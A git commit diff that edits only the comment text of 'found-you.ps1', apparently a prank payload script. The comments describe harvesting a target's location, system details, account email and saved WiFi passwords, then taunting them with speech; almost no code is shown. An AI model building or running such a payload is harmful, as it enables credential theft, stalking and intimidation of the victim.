Update found-you.ps1
This commit is contained in:
parent
5d82adfb63
commit
2f66ab3787
1 changed files with 6 additions and 6 deletions
|
@ -19,17 +19,17 @@
|
||||||
|
|
||||||
<#
|
<#
|
||||||
.NOTES
|
.NOTES
|
||||||
The targets Location Services must be turned on or this payload will not work
|
The target's Location Services must be turned on or this payload will not work.
|
||||||
|
|
||||||
.SYNOPSIS
|
.SYNOPSIS
|
||||||
This script will get the users location and open a map of where they are in their browser and use windows speech to declare you know where they are
|
This script will get the user's location and open a map of where they are in their browser and use Windows speech to declare you know where they are.
|
||||||
|
|
||||||
.DESCRIPTION
|
.DESCRIPTION
|
||||||
This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account.
|
This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with their Microsoft account.
|
||||||
The SSID and WiFi password of any current or previously connected to networks.
|
The SSID and WiFi password of any current or previously connected to networks.
|
||||||
It determines the last day they changed their password and how many days ago.
|
It determines the last day they changed their password and how many days ago.
|
||||||
Once the information is gathered the script will pause until a mouse movement is detected
|
Once the information is gathered, the script will pause until a mouse movement is detected.
|
||||||
Then the script uses Sapi speak to roast their set up and lack of security
|
Then the script uses Sapi speak to roast their set up and lack of security.
|
||||||
#>
|
#>
|
||||||
|
|
||||||
#-----------------------------------------------------------------------------------------------------------------------------------------------------------
|
#-----------------------------------------------------------------------------------------------------------------------------------------------------------
|
||||||
|
@ -37,7 +37,7 @@
|
||||||
<#
|
<#
|
||||||
|
|
||||||
.NOTES
|
.NOTES
|
||||||
This is to get the Name associate with the targets microsoft account, if not detected UserName will be used
|
This is to get the name associated with the targets Microsoft account, if not detected UserName will be used.
|
||||||
#>
|
#>
|
||||||
|
|
||||||
function Get-fullName {
|
function Get-fullName {
|
||||||
|
|
Loading…
Reference in a new issue